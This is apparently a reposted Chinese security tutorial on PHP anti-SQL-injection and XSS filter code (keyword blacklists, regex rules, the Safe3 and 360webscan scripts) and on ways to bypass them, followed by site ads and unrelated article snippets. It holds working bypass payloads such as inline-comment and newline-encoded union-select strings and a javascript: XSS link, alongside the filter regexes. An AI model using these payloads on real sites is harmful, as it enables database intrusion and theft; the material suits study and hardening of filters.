PHP代码层防护与绕过

摘要:
这里我们讨论了不完美的关键字过滤和常见的规则匹配问题,并收集了网络上常见的PHP全局保护代码进行分析。˃0x03正则匹配1.boundary关键字表示单词的边界,因此只有独立的“union”单词将与PHP筛选器代码匹配,如下所示:˂?12345来自*/users2。匹配模式i忽略大小写。匹配不考虑这种情况。默认的PHP筛选器代码不匹配多行,如下所示:˂?)select))/ims“,$_GET['id'])0x03PHP通用保护代码1,safe3防注入代码˂?

0x01 前言

  在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。

  这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。

  Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。

0x02 关键字过滤

1、使用strpos过滤关键字

PHP过滤代码如下:

<?php
$str
= "and|or|union|select|from|where|limit|order by|guoup by|<script>|</script>"; $arr=explode("|",$str); #print_r($arr); foreach($arr as $key=>$val){ $flag=strpos($_GET['id'],$val); if ($flag){ echo 'Error'; exit(); } }
?>

Bypass思路:strpos() 函数查找字符串在另一字符串中第一次出现的位置。strpos() 函数对大小写敏感。

      id=1 AND 1=1 UNION SELECT 1,2,3  FROM ADMIN

2、使用stripos,进行关键字过滤

   与strpos相比,stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)

PHP过滤代码如下:

<?php
$str = "and|or|union|select|from|where|limit|order by|guoup by|<script>|</script>";
$arr=explode("|",$str);
#print_r($arr);
foreach($arr as $key=>$val){
$flag=strpos($_GET['id'],$val);
if ($flag){
    echo 'Error';
    exit();
}
}
?>

Bypass思路:

    当$flag等于0,即关键字在输入参数的第一位,可绕过

    id=</script><a href="javascript:alert(/xss/)">xsstest<a>

关键字过滤类似的方法:

<?php
$blacklist_keywords = 'select,from,1=1,--,union,#';
$blacklist = explode(',',$blacklist_keywords);
print_r($blacklist);
foreach($blacklist as $key=>$value){
    //$_REQUEST['id'] = str_replace(strtolower($value),'',strtolower($_REQUEST['id']));               
    $_REQUEST['id'] = str_replace($value,'',$_REQUEST['id']);
}
echo $_REQUEST['id'];

?>
0x03 正则匹配

1、边界关键词

表示单词的边界,因此只有独立的 "union" 单词会被匹配

PHP过滤代码如下:

<?php
if  (preg_match("/(union|select|from)/i",$_GET['id'])==1){ 
    echo "Error";
    exit();
}
echo "success" ;
?>

Bypass思路:

  通过数据库的特性,在关键字前后添加字符,打扰关键字边界判断

  id=1e0union/*!12345select*/1,2,3,4/*!12345from*/users

2、匹配模式

  i 忽略大小写,匹配不考虑大小写,默认不匹配多行

PHP过滤代码如下:

<?php
if  (preg_match("/(?:(union(.*?)select))/i",$_GET['id'])==1){ 
    echo "Error";
    exit();
}
echo "success" ;
?>

 Bypass思路:

  通过换行 可绕过,url编码为%0a

  id=1 union%23%0aseleCT 1,2,3,4 from users

修复方案:

  preg_match("/(?:(union(.*?)select))/ims",$_GET['id'])

0x03 PHP通用防护代码

1、safe3 防注入代码

<?php
//Code By Safe3 
ini_set('date.timezone','Asia/Shanghai');
function customError($errno, $errstr, $errfile, $errline)
{
    echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";
    die();
}
set_error_handler("customError",E_ERROR);
$getfilter="'|select|from|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
$postfilter="\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
$cookiefilter="\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){

    if(is_array($StrFiltValue))
    {
        $StrFiltValue=implode($StrFiltValue);
    }
    if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){
        slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面:".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交数据: ".$StrFiltValue);
        @header("http/1.1 404 not found"); 
        print "<html><title>404: Not Found</title>";
        //slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面:".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交数据: ".$StrFiltValue);
        print "<body>Url里含有非法字符串,属于有误操作!... <a href='http://t.zoukankan.com/'>您还可以返回首页</a></body></html>";
  ;exit();
    }
}
//$ArrPGC=array_merge($_GET,$_POST,$_COOKIE);
foreach($_GET as $key=>$value){
    StopAttack($key,$value,$getfilter);
}
foreach($_POST as $key=>$value){
    StopAttack($key,$value,$postfilter);
}
foreach($_COOKIE as $key=>$value){
    StopAttack($key,$value,$cookiefilter);
}
function slog($logs)
{
    $toppath=$_SERVER["DOCUMENT_ROOT"]."/log.htm";
    $Ts=fopen($toppath,"a+");
    fputs($Ts,$logs."
");
    fclose($Ts);
}
?>

如果正面怼正则,实在想不到绕过的方式。。。。 

2、360webscan防御脚本

  360网站安全:http://webscan.360.cn

  http://webscan.360.cn/protect/index/?act=reinstall&domain=www.test.com下载漏洞修复插件360webscan.zip  多次下载解压失败,

  无奈,跑到cmseasy下载最新版cms,解压获取 webscan360/360safe目录,分享到网盘,链接: https://pan.baidu.com/s/1nviNi2l 密码: 3itq

  WEBSCAN_VERSION :0.1.3.2

PHP代码层防护与绕过第1张

SQL语句测试,成功拦截: 

PHP代码层防护与绕过第2张

Bypass思路:

  关键的两个正则:

  UNION.+?SELECTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)

  (SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))

  id=1e0union select!1,user(),3,4 from users

PHP代码层防护与绕过第3张

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

PHP代码层防护与绕过第4张

参考地址:

  PHP preg_replace() 正则替换所有符合条件的字符串  http://www.jb51.net/article/46458.htm

  360webscan防火墙的防御与绕过           https://tieba.baidu.com/p/3813928365?red_tag=2255813250

  PHP跨站脚本攻击(XSS)漏洞修复方法(一)       https://zhangge.net/4965.html

免责声明:文章转载自《PHP代码层防护与绕过》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇Java getBytes字符集问题SQL创建索引、主键下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

SqlServer临时表

临时表的使用   什么是临时表临时表分为两种:本地和全局临时表。本地临时表仅在当前会话中可见;全局临时表在所有会话中都可见。 本地临时表的名称前面有一个编号符 #table_name,而全局临时表的名称前面有两个编号符 ##table_name。 临时表的使用场景 数据二次过滤 数据库中表创建完成之后,对于复杂的查询,可以引入临时表,将数据插入到临时表...

TOP 子句用于规定要返回的记录的数目。

TOP 子句用于规定要返回的记录的数目。 1、SQL server的语法: SELECT TOP number|percent column_name(s) FROM table_name; 例子:从表persons中选取前2行的数据; SELECT TOP 2 * FROM persons; 从表persons中去前50%的 数据: SELECT TOP...

Oracle行列转换的几种实现方法

假如有如下表,其中各个i值对应的行数是不定的SQL> select * from t; I A D———- ———- ——————-1 b 2008-03-27 10:55:421 a 2008-03-27 10:55:461 d 2008-03-27 10:55:302 z 2008-03-27 10:55:552 t 2008-03-27 10:...

Mybatis之collection与association标签

collection与association标签的功能就是为了解决查询条件映射到一个类或一个集合上,适用于对于多对一,一对多的映射结果,现在我们就探究其具体使用吧。 环境搭建: 数据库搭建 CREATE TABLEteacher ( id INT(10) NOT NULL, name VARCHAR(30) DEFAULT NULL, PRI...

Oracle中特殊的INSERT语句

---------------------------------------insert into table-name select ...---------------------------------------insert into table-name values(coL-values, ... default)--------------...

mybatis的xml中sql语句中in的写法(迭代遍历)

这里使用 foreach标签 <foreach  item="item" collection="listTag" index="index"  open="(" separator="," close=")"> #{item} </foreach> foreach元素的属性主要有 item,index,collection,ope...